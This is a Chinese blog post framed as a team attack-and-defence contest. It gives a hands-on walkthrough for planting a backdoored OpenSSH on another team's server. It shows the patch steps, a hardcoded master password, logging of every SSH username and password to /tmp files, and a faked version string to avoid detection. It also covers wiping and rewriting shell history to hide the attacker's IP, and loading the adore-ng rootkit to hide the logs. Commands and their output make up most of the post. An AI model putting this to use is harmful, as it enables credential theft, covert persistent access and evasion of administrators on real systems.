擂台赛-安全攻防之使用openssh后门获取root密码实战
前言
大家好,我是沐风晓月,我们开始组队学习了,介绍下我们的情况:
这几天跟队员 迎月,虹月,心月,古月打擂台,我和心月一组,相互攻占对方服务器。 终于在今早凌晨三点拿下对方服务器的权限。
接下来我们第一想做的就是如何维持这个权限,还要不被对方发现。
关于维持权限,我们第一时间想到的就是在对方服务器留下一个后门,搜索了很多资料,发现这个openssh的后门正合我意。
于是开干。。。
文章目录
- 前言
- 一. 配置实验环境
- 二. 对openssh-5.9p1 打后门漏洞补丁
- 2.1 解压
- 2.2 打补丁
- 2.3 修改后门密码和记录位置
- 2.4 安装打了后门补丁的sshd服务
- 2.5 启动并查看版本号
- 三. 测试
- 3.1 测试能否记录用户名和密码
- 3.2 修改了密码还能否记录
- 3.3 .能否记录普通用户密码
- 3.4 测试 后门密码是否可以登录
- 3.5 清理本次登录的脚印
- 四. 安装adore-ng
- 4.1 安装的过程
- 4.2 隐藏文件
- 4.3 测试文件是否还能被找到
- 总结
![在这里插入图片描述](https://img-blog.csdnimg.cn/5f503e43f7cc4145aa17abbef17868d5.jpeg#pic_center)
一. 配置实验环境
为了确保修改对方openssh后,还能不被古月她们发现,我们先检查了对方服务器的ssh版本和gcc版本:
- 检查ssh 版本
[root@mufeng ~]# ssh -v
OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013
- 检查gcc是否已经安装
[root@mufeng ~]# yum install gcc gcc-c++ -y
然后开始上环我们需要的包,安装完成后,再把包全部删掉即可:
- 上传我们需要的包
上传0x06-openssh-5.9p1.patch.tar.gz , openssh-5.9p1.tar.gz ,inotify-tools-3.13.tar.gz 到linux 的/software目录
[root@mufeng ~]# mkdir /software
[root@mufeng ~]# cd !$
cd /software
[root@mufeng software]# yum install lr* -y &>/dev/null && echo "ok"
ok[root@mufeng software]# rz ## 上传软件包
[root@mufeng software]# ls
0x06-openssh-5.9p1.patch.tar.gz openssh-5.9p1.tar.gz
inotify-tools-3.13.tar.gz sshpass-1.06.tar.gz
上传完成包之后,开始对打补丁并进行安装:
二. 对openssh-5.9p1 打后门漏洞补丁
2.1 解压
[root@mufeng software]# tar xf openssh-5.9p1.tar.gz
You have mail in /var/spool/mail/root
[root@mufeng software]# tar xf 0x06-openssh-5.9p1.patch.tar.gz
[root@mufeng software]# ls
0x06-openssh-5.9p1.patch.tar.gz openssh-5.9p1 openssh-5.9p1.tar.gz
inotify-tools-3.13.tar.gz openssh-5.9p1.patch sshpass-1.06.tar.gz
[root@mufeng software]#
2.2 打补丁
[root@mufeng software]# cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1/
[root@mufeng software]# cd !$
cd openssh-5.9p1/
[root@mufeng openssh-5.9p1]# patch < sshbd5.9p1.diff
patching file auth.c # 认证
patching file auth-pam.c # 认证
patching file auth-passwd.c # 认证
patching file canohost.c
patching file includes.h
patching file log.c
patching file servconf.c # 关于ssh 服务器
patching file sshconnect2.c ## ssh 连接
patching file sshlogin.c ## 关于登录,记录root密码
patching file version.h ## 关于版本
2.3 修改后门密码和记录位置
[root@mufeng openssh-5.9p1]# tail -6 includes.h
int secret_ok;
FILE *f;
#define ILOG "/tmp/ilog" ## 记录登录到本机的用户名和密码
#define OLOG "/tmp/olog" # 记录本机登录其他服务器用户名和密码
#define SECRETPW "mufeng123" # 后门密码
#endif /* INCLUDES_H */
[root@mufeng openssh-5.9p1]#
修改版本号(修改的和原来一致)
[root@mufeng openssh-5.9p1]# cat version.h
/* $OpenBSD: version.h,v 1.62 2011/08/02 23:13:01 djm Exp $ */#define SSH_VERSION "OpenSSH_5.3"#define SSH_PORTABLE "p1"
#define SSH_RELEASE SSH_VERSION SSH_PORTABLE
[root@mufeng openssh-5.9p1]#
2.4 安装打了后门补丁的sshd服务
[root@mufeng openssh-5.9p1]# yum install -y openssl openssl-devel pam-devel zlib zlib-devel >/root/instal.txt && echo "ok"
开始编译安装
[root@mufeng openssh-5.9p1]# ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5[root@mufeng openssh-5.9p1]# make && make install
2.5 启动并查看版本号
[root@mufeng openssh-5.9p1]# service sshd restart
停止 sshd: [确定]
正在启动 sshd: [确定]
[root@mufeng openssh-5.9p1]# ssh -V
OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013
这里一定要设置的与ssh原来的版本号一致,要不然就暴露了。
三. 测试
测试主要基于以下几点:
- 测试是否可以记录对方登录服务器的账号和密码
- 测试在用户修改密码后,还能继续记录账号和密码
- 测试是否可以记录普通用户的密码
- 测试是否可以使用后门漏洞密码登录系统
3.1 测试能否记录用户名和密码
root@mufeng tmp]# ssh 192.168.1.43
The authenticity of host '192.168.1.43 (192.168.1.43)' can't be established.
ECDSA key fingerprint is bf:a1:c7:0d:6c:4b:e4:19:f5:b8:16:e3:f8:4a:e5:5c.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.43' (ECDSA) to the list of known hosts.
root@192.168.1.43's password:
Last login: Fri Mar 17 14:40:10 2023 from 192.168.1.4
[root@mufeng ~]# exit
logout
Connection to 192.168.1.43 closed.
[root@mufeng tmp]# ls
ilog olog
##查看是否可以记录密码
[root@mufeng tmp]# cat ilog
user:password --> root:12345678
## 包含用户名+密码+IP
[root@mufeng tmp]# cat olog
user:password@host --> root:12345678@192.168.1.43
[root@mufeng tmp]#
以上证明了,可以记录对方的账号和密码
3.2 修改了密码还能否记录
测试过程代码:
[root@mufeng tmp]# echo 1234567890 |passwd --stdin root
更改用户 root 的密码 。
passwd: 所有的身份验证令牌已经成功更新。
[root@mufeng tmp]# ssh 192.168.1.43
root@192.168.1.43's password:
Last login: Fri Mar 17 15:03:29 2023 from 192.168.1.43
[root@mufeng ~]# exit
logout
Connection to 192.168.1.43 closed.
[root@mufeng tmp]# cat olog
user:password@host --> root:12345678@192.168.1.43
user:password@host --> root:1234567890@192.168.1.43
[root@mufeng tmp]# cat ilog
user:password --> root:12345678
user:password --> root:1234567890
[root@mufeng tmp]#
以上证明了即使对方修改了密码,也一样可以记录。
3.3 .能否记录普通用户密码
[root@mufeng tmp]# useradd mufeng
[root@mufeng tmp]# echo 123456 |passwd --stdin mufeng
更改用户 mufeng 的密码 。
passwd: 所有的身份验证令牌已经成功更新。
[root@mufeng tmp]# ssh mufeng@192.168.1.43
mufeng@192.168.1.43's password:
[mufeng@mufeng ~]$ whoami
mufeng
[mufeng@mufeng ~]$ exit
logout
Connection to 192.168.1.43 closed.
[root@mufeng tmp]# cat ilog
user:password --> root:12345678
user:password --> root:1234567890
user:password --> mufeng:123456
[root@mufeng tmp]# cat olog
user:password@host --> root:12345678@192.168.1.43
user:password@host --> root:1234567890@192.168.1.43
user:password@host --> mufeng:123456@192.168.1.43
[root@mufeng tmp]#
以上代码成功的记录了,对方使用普通用户登录时的用户名和密码
3.4 测试 后门密码是否可以登录
[root@mufeng tmp]# cat olog
user:password@host --> root:12345678@192.168.1.43
user:password@host --> root:1234567890@192.168.1.43
user:password@host --> mufeng:123456@192.168.1.43
[root@mufeng tmp]# ssh root@192.168.1.43
root@192.168.1.43's password:
Last login: Fri Mar 17 15:05:42 2023 from 192.168.1.43
[root@mufeng ~]# exit
logout
Connection to 192.168.1.43 closed.
[root@mufeng tmp]# cat olog
user:password@host --> root:12345678@192.168.1.43
user:password@host --> root:1234567890@192.168.1.43
user:password@host --> mufeng:123456@192.168.1.43
user:password@host --> root:mufeng123@192.168.1.43
[root@mufeng tmp]#
3.5 清理本次登录的脚印
一定要清除掉自己登录的IP信息
[root@mufeng ~]# export HISTFILE=/dev/null
You have mail in /var/spool/mail/root
[root@mufeng ~]# export HISTSIZE=
[root@mufeng ~]# export HISTFILESIZE=
[root@mufeng ~]# echo >/root/.bash_history
# 这种清除方式,要确保一开始没有历史记录,如果有历史记录,可以用sed的方式替换
[root@mufeng ~]# sed -i 's/192.168.1.43/127.0.0.1/g' /root/.bash_history
## 其他访问日志也可以用用sed替换ip , 瞒天过海
接下来要把生成的文件进行隐藏,本次隐藏,我们沐风晓月组采用的是adore-ng
, 这个工具是以模块的方式运行的,就类似于你电脑上的声卡,只要隐藏的好很难被发现。
这里我只写对两个文件/tmp/olog
和/tmp/ilog
进行隐藏,其他的文件和目录也是同样的方法。
四. 安装adore-ng
4.1 安装的过程
- 安装依赖包
[root@mufeng ~]# rpm -ivh /mnt/Packages/kernel-devel-2.6.32-696.el6.x86_64.rpm
warning: /mnt/Packages/kernel-devel-2.6.32-696.el6.x86_64.rpm: Header V3 RSA/SHA1 Signature, key ID c105b9de: NOKEY
Preparing... ########################################### [100%]1:kernel-devel ########################################### [100%]
- 上传需要adore-ng
[root@mufeng ~]# rz解压
[root@mufeng ~]# unzip adore-ng-master.zip [root@mufeng ~]# cd adore-ng-master
[root@mufeng adore-ng-master]# ls
adore-ng.c ava.c libinvisible.h Makefile
adore-ng.h libinvisible.c LICENSE README.md
- 开始安装
安装
[root@mufeng adore-ng-master]# make
加载模块
[root@mufeng adore-ng-master]# insmod adore-ng.ko
[root@mufeng adore-ng-master]#
- 查看命令是否安装
[root@mufeng adore-ng-master]# ./ava hUsage: ./ava {h,u,r,R,i,v,U} [file or PID]I print info (secret UID etc)h hide file # 隐藏文件u unhide file ## 不隐藏r execute as root ## 像root一样去运行R remove PID foreverU uninstall adorei make PID invisible ## 隐藏进程v make PID visible
4.2 隐藏文件
需要隐藏 ilog, olog
[root@mufeng adore-ng-master]# ./ava h /tmp/ilog
56,0,0,56
Adore 1.56 installed. Good luck.
File '/tmp/ilog' is now hidden.
[root@mufeng adore-ng-master]# [root@mufeng adore-ng-master]# ./ava h /tmp/olog
56,0,0,56
Adore 1.56 installed. Good luck.
File '/tmp/olog' is now hidden.
查看是否隐藏成功:
4.3 测试文件是否还能被找到
- 使用find查找
[root@mufeng tmp]# find ./ -mtime -1
./
./orbit-root
./orbit-root/linc-f46-0-4088aa9a676df
./gconfd-root
./gconfd-root/saved_state_db283d80792451243e0a59a40000002b
发现无法找到文件了
但当我们直接使用文件名查看内容的时候,还是可以查看的,说明文件并不是被删除了,而是被隐藏
了
总结
虹月组目前还未发现他们的服务已经被植入后门漏洞,今天心月提到可以再加上一个功能:邮件发送功能,实现当虹月组登录服务器,就能收到信息。
听起来是个好主意,下次补上。
好了以上是本文的全部内容,下次再见吧。
💕 好啦,这就是今天要分享给大家的全部内容了,我们下期再见!
💕 本文由沐风晓月原创,首发于CSDN博客, 博客主页:mufeng.blog.csdn.net
💕 每一次学习都很枯燥,单调,孤独,甚至看不到未来,每一次遇到问题都让人疑惑,焦虑,怀疑,甚至想要放弃。 但坚定的走下来,会收获很多。收获的不单单是技术的成长还有一颗强大的心。
💕 喜欢的话记得点赞收藏哦
相关文章:
![](https://img-blog.csdnimg.cn/e07ad59f04ca4db487ce2ffc9010d0e4.png)
擂台赛-安全攻防之使用openssh后门获取root密码实战
前言 大家好,我是沐风晓月,我们开始组队学习了,介绍下我们的情况: 这几天跟队员 迎月,虹月,心月,古月打擂台,我和心月一组,相互攻占对方服务器。 终于在今早凌晨三点拿…...
![](https://img-blog.csdnimg.cn/61fcba5076e64ee18b3ef49e6320bc95.png#pic_center)
关于React入门基础从哪学起?
文章目录前言一、React简介1. React是什么2. react 与 vue 最大的区别就是:3. React特点4. React介绍描述5. React高效的原因6.React强大之处二、React基础格式1.什么是虚拟dom?2.为什么要创建虚拟dom?三、React也分为俩种创建方式1. 使用js的方式来创建…...
![](https://img-blog.csdnimg.cn/c5aafc3e7b34496caad9dbcc57a1c673.png)
python玄阶斗技--tkinter库
目录 一.tkinter库介绍 二.功能实现 1.窗口创建 2.Button 按钮 3.Entry 文本输入域 4.text 文本框 5.Listbox 多选下拉框 6.Radiobutton 多选项按钮 7.Checkbutton 多选按钮 8.Scale 滑块(拉动条) 9.Scroolbar 滚动条 10.Menu 菜单栏 11. messagebox 消息框 12…...
![](https://img-blog.csdnimg.cn/e757da467ae64ea392809aa7939a2d3b.png)
【MySQL】MySQL的介绍MySQL数据库及MySQL表的基本操作
文章目录数据库的介绍什么是数据库数据库分类MySQL的介绍数据库的基本操作数据库的操作创建数据库查看所有数据库选中指定的数据库删除数据库常用数据类型数值类型字符串类型日期类型表的操作创建表查看指定数据库下的所有表查看指定表的结构删除表小练习数据库的介绍 什么是数…...
![](https://www.ngui.cc/images/no-images.jpg)
【每日随笔】社会上层与中层的博弈 ( 技术无关、没事别点进来看 | 社会上层 | 上层与中层的保护层 | 推荐学习的知识 )
文章目录一、社会上层二、上层与中层的保护层三、推荐学习的知识一、社会上层 社会上层 掌握着 生产资料 和 权利 ; 社会中层 是 小企业主 和 中产打工人 ; 上层 名额有限 生产资料所有者 : 垄断巨头 , 独角兽 , 大型企业主 , 大型企业股东 , 数量有限 ;权利所有者 : 高级别的…...
![](https://img-blog.csdnimg.cn/defe75c61388401c8eba4cf84fc93efd.jpeg)
Cookie 和 Session的区别
文章目录时间:2023年3月23日第一:什么是 Cookie 和 Session ?什么是 Cookie什么是 Session第二:Cookie 和 Session 有什么不同?第三:为什么需要 Cookie 和 Session,他们有什么关联?第四&#x…...
![](https://img-blog.csdnimg.cn/67f2c89619024d288ac64d5d83c03bea.png)
leetcode使用vscode调试C++代码
leetcode使用vscode调试C代码 这里记录一下大体思路吧,关于细节配置放上别的博主的链接,他们讲的更好 vscode只是编辑器,相当于记事本,需要下载minGW提供的编译器和调试器 官方介绍: C/C拓展不包括编译器或调试器&…...
![](https://img-blog.csdnimg.cn/7190cf63e3384951a35f25eefe30c13d.png)
树莓派Linux源码配置,树莓派Linux内核编译,树莓派Linux内核更换
目录 一 树莓派Linux的源码配置 ① 内核源码下载说明 ② 三种方法配置源码 二 树莓派Linux内核编译 ① 内核编译 ② 编译时报错及解决方案(亲测) 三 更换树莓派Linux内核 操作步骤说明 ● dmesg报错及解决方案(亲测࿰…...
![](https://www.ngui.cc/images/no-images.jpg)
【C语言】深度讲解 atoi函数 使用方法与模拟实现
文章目录atoi使用方法:atoi模拟实现atoi 功能:转化字符串到整数 头文件: #include <stdlib.h> int atoi (const char * str); 参数 str:要转换为整数的字符串 返回值 如果转换成功,函数将转换后的整数作为int值…...
![](https://img-blog.csdnimg.cn/img_convert/6763d4fe1c0dcd113e614e681a25f4be.png)
HTTPS的加密流程
1、概念HTTPS 是一个应用层协议,是在 HTTP 协议的基础上引入了一个加密层。HTTP 协议内容都是按照文本的方式明文传输的,这就导致在传输过程中出现一些被篡改的情况。HTTP协议传输的数据都是未加密的,也就是明文的,因此使用HTTP协…...
![](https://img-blog.csdnimg.cn/881421e1d3bb48d99f49f7347281adec.png)
STM32配置读取BMP280气压传感器数据
STM32配置读取BMP280气压传感器数据 BMP280是在BMP180基础上增强的绝对气压传感器,在飞控领域的高度识别方面应用也比较多。 BMP280和BMP180的区别: 市面上也有一些模块: 这里介绍STM32芯片和BMP280的连接和数据读取。 电路连接 BMP28…...
![](https://img-blog.csdnimg.cn/7e961d3832f345c3bcaed72632f1cf1f.png)
【Linux】 基础IO——文件(中)
文章目录1. 文件描述符为什么从3开始使用?2. 文件描述符本质理解3. 如何理解Linux下的一切皆文件?4. FILE是什么,谁提供?和内核的struct有关系么?证明struct FILE结构体中存在文件描述符fd5. 重定向的本质输出重定向输…...
![](https://img-blog.csdnimg.cn/f8b284a4e903400a9f74036e9221054b.jpeg#pic_center)
蓝桥杯刷题冲刺 | 倒计时13天
作者:指针不指南吗 专栏:蓝桥杯倒计时冲刺 🐾马上就要蓝桥杯了,最后的这几天尤为重要,不可懈怠哦🐾 文章目录1.母牛的故事2.魔板1.母牛的故事 题目 链接: [递归]母牛的故事 - C语言网 (dotcpp.c…...
![](https://img-blog.csdnimg.cn/14d3775af9f24646b18aaed4f56ff521.png)
MIPI D-PHYv2.5笔记(5) -- 不同的PHY配置方式
声明:作者是做嵌入式软件开发的,并非专业的硬件设计人员,笔记内容根据自己的经验和对协议的理解输出,肯定存在有些理解和翻译不到位的地方,有疑问请参考原始规范看 规范5.7章节列举了一些常见的PHY配置,但实…...
![](https://img-blog.csdnimg.cn/2861b8f07a834cb0ae54f8d1435f7bae.gif#pic_center)
【周末闲谈】文心一言,模仿还是超越?
个人主页:【😊个人主页】 系列专栏:【❤️周末闲谈】 周末闲谈 ✨第一周 二进制VS三进制 文章目录周末闲谈前言一、背景环境二、文心一言?(_)?三、文心一言的优势?😗😗😗四、文心一…...
![](https://img-blog.csdnimg.cn/img_convert/52c8fd60de910fd885651d65c6231b84.jpeg)
《一“企”谈》 | 「佛山市政」:携手企企通,让采购业务数智化
近日,国家施工总承包壹级企业「佛山市市政建设工程有限公司」(以下简称“佛山市政”)正积极布局数字化建设工作,基于采购业务数智化,携手企企通打造了SaaS采购云平台。 01、岭南建筑强企 匠心铸造精品 …...
![](https://img-blog.csdnimg.cn/dc9927dff61c49a880516d8893676a77.png)
Spark运行架构
目录 1 运行架构 2 核心组件 2.1 Driver 2.2 Executor 2.3 Master & Worker 2.4 ApplicationMaster 3 核心概念 3.1 Executor 与 Core 3.2 并行度( Parallelism) 3.3 有向无环图( DAG) 4 提交流程 …...
![](https://img-blog.csdnimg.cn/a5de880907954b1fa54450852b8c2495.jpeg#pic_center)
基于卷积神经网络CNN的水果分类预测,卷积神经网络水果等级识别
目录 背影 卷积神经网络CNN的原理 卷积神经网络CNN的定义 卷积神经网络CNN的神经元 卷积神经网络CNN的激活函数 卷积神经网络CNN的传递函数 卷积神经网络CNN水果分类预测 基本结构 主要参数 MATALB代码 结果图 展望 背影 现在生活,为节能减排,减少电能…...
![](https://www.ngui.cc/images/no-images.jpg)
Spring Boot 框架总结
Spring Boot 框架总结 1. springboot的引言 Spring Boot是由Pivotal团队提供的全新框架,其设计目的是用来简化Spring应用的 初始搭建以及开发过程。该框架使用了特定的方式来进行配置,从而使开发人员不 再需要定义样板化的配置。通过这种方式࿰…...
![](https://img-blog.csdnimg.cn/357e2e1a5d154f0493d15bfe3430059b.png)
【数据结构】第五站:带头双向循环链表
目录 一、链表的八种结构 二、带头双向循环链表的实现 1.链表的定义 2.链表的接口定义 3.接口的具体实现 三、带头双向循环链表的完整代码 四、顺序表和链表的区别 一、链表的八种结构 我们已经知道链表可以有以下三种分法 而这三种结构又可以排列组合,形成八…...
![](https://www.ngui.cc/images/no-images.jpg)
Springboot生成二维码
Springboot生成二维码整合 我们使用两种方式,去生成二维码,但是其实,二维码的生成基础,都是zxing包,这是Google开源的一个包,第一种是使用原始的zxing方式去实现,第二种是使用hutool来实现&…...
![](https://img-blog.csdnimg.cn/img_convert/5a62d0becec182f02210c90752e578e5.png)
“独裁者”何小鹏,再造小鹏汽车
文丨智能相对论 作者丨沈浪 如果没有何小鹏,小鹏汽车将失去灵魂。 2014年,夏珩、何涛等人在广州组建小鹏汽车(当时还叫“橙子汽车”),何小鹏还只是股权投资人。 夏珩、何涛原任职于广汽,负责新能源汽车…...
![](https://img-blog.csdnimg.cn/44220da5e4fb46efbb5f3f3fdf057bc4.gif)
数据结构 | 泛型 | 擦除机制| 泛型的上界
目录 编辑 1.泛型 1.1Object类引出泛型概念 2.泛型语法 2.1泛型编写代码 3.泛型的机制 3.1擦除机制 4.泛型的上界 4.1泛型上界的语法 4.2泛型上界的使用 5.泛型方法 5.1泛型方法语法 5.2泛型方法的使用 1.泛型 一般的类和方法中,只能使用具体的代码…...
![](https://www.ngui.cc/images/no-images.jpg)
C++拷贝构造函数(复制构造函数)详解
拷贝和复制是一个意思,对应的英文单词都是copy。对于计算机来说,拷贝是指用一份原有的、已经存在的数据创建出一份新的数据,最终的结果是多了一份相同的数据。例如,将 Word 文档拷贝到U盘去复印店打印,将 D 盘的图片拷…...
![](https://www.ngui.cc/images/no-images.jpg)
python学习——多线程
python学习——多线程概念python中线程的开发线程的启动线程的退出和传参threading的属性和方法threading实例的属性和方法多线程daemon线程和non-demone线程daemon线程的应用场景线程的jointhreading.local类线程的延迟执行:Timer线程同步Event 事件Lock ——锁加锁…...
![](https://img-blog.csdnimg.cn/7caf27c432544fd1ab38c60e4667ed35.png)
SAP 系统中过账码or记账码
SAP中过账码和记账码是指同一个事物。 在实际业务中,记账码就是只有“借”和“贷”, 而SAP中Posting Code肩负着更多的任务: 1)界定科目类型, 2)借贷方向, 3)凭证输入时画面上的字…...
![](https://img-blog.csdnimg.cn/ee032a57a9834cb1801423f19407ec36.png)
【FreeRTOS(一)】FreeRTOS新手入门——初识FreeRTOS
初识FreeRTOS一、实时操作系统概述1、概念2、RTOS的必要性3、RTOS与裸机的区别4、FreeRTOS的特点二、FreeRTOS的架构三、FreeRTOS的代码架构一、实时操作系统概述 1、概念 RTOS:根据各个任务的要求,进行资源(包括存储器、外设等)…...
![](https://www.ngui.cc/images/no-images.jpg)
Python中 __init__的通俗解释是什么?
__init__是Python中的一个特殊方法,用于在创建对象时初始化对象的属性。通俗来讲,它就像是一个构造函数,当我们创建一个类的实例时,__init__方法会被自动调用,用于初始化对象的属性。 举个例子,如果我们定义…...
![](https://img-blog.csdnimg.cn/fd93c95cfd3e40c686b74f8807b695cb.jpeg)
网友真实面试总结出的自动化测试面试题库
目录 常规问题 手工测试部 自动化测试 自动化测试面试题2:selenium篇 常规问题 1、如何快速深入的了解移动互联网领域的应用 (答案:看http协议 restful api知识 json加1分) 2、对xx应用自己会花多久可以在业务上从入门到精通&…...
![](https://img-blog.csdnimg.cn/b85141a918ca4f7d9bb0a82cd7a727a0.png)
2023 年最佳 C++ IDE
文章目录前言1. Visual Studio2. Code::Blocks3. CLion4. Eclipse CDT(C/C 开发工具)5. CodeLite6. Apache NetBeans7. Qt Creator8. Dev C9. C Builder10. Xcode11. GNAT Programming Studio12. Kite总结前言 要跟踪极佳 IDE(集成开发环境&…...
![](/images/no-images.jpg)
08服务器做网站/免费制作网站的软件
一、条件语句1. if语句if 语句用于控制程序的执行,基本形式为:if 判断条件1:执行语句elif 判断条件2:执行语句else:执行语句判断条件成立时,则执行后面的语句。执行内容可以多行,以缩进来区分表…...
![](/images/no-images.jpg)
网络规划是干什么的/seo的作用
大家都知道,用document.getElementById(‘element).style.xxx可以获取元素的样式信息,可是它获取的只是DOM元素style属性里的样式规则,对于通过class属性引用的外部样式表,就拿不到我们要的信息了。 DOM标准里有个全局方法getComp…...
![](http://hiphotos.baidu.com/see7di/pic/item/12094aee8dd9128fb3fb95a3.jpg)
wordpress 判断置顶/百度关键字
/*/调用方法: Pop(this,{ pos:3,//上;右;下;左 tim:3000, oft:{x:10,y:0}, htm:这是需要显示的内容<br>HTML5入门之新标签的解析,//可以为fun fun:function(i){} }); Pop(); /*/ 核心代码 var Popfunction(i,opt){ var $Pop,$Hand; if(!i || !opt){Function.attempt(func…...
![](https://img-blog.csdnimg.cn/img_convert/2a81d3d14e5f87bda3141082e5023e36.png)
深圳服务好的网站建设/手机百度2020
今天正好遇到了,就记一下一.作用:仅用与编写单元测试, 一般不用于生产环境assert 理论上和 if 类似, 但是assert 仅仅用于测试, 不能用于业务from jdk 1.4二.assert 关键字(Java断言)1. 使用断言要添加断言,只需使用assert关键字并为其赋予布…...
![](/images/no-images.jpg)
做查询网站有哪些/seo网站系统
1. 题目 原题链接 给你两个有序整数数组 nums1 和 nums2,请你将 nums2 合并到 nums1 中,使 nums1 成为一个有序数组。 初始化 nums1 和 nums2 的元素数量分别为 m 和 n 。你可以假设 nums1 的空间大小等于 m n,这样它就有足够的空间保存来…...
![](/images/no-images.jpg)
用什么编辑wordpress/香港服务器
0.新建操作:mkdir abc #新建一个文件夹touch abc.sh #新建一个文件echo "abc" > test.txt #新建一个文件,并将abc写入。这里用到了重定向符1.查看操作查看目录:ll #显示目录文件详细信息du -h 文件/目录 #查看大小pwd #显示路径…...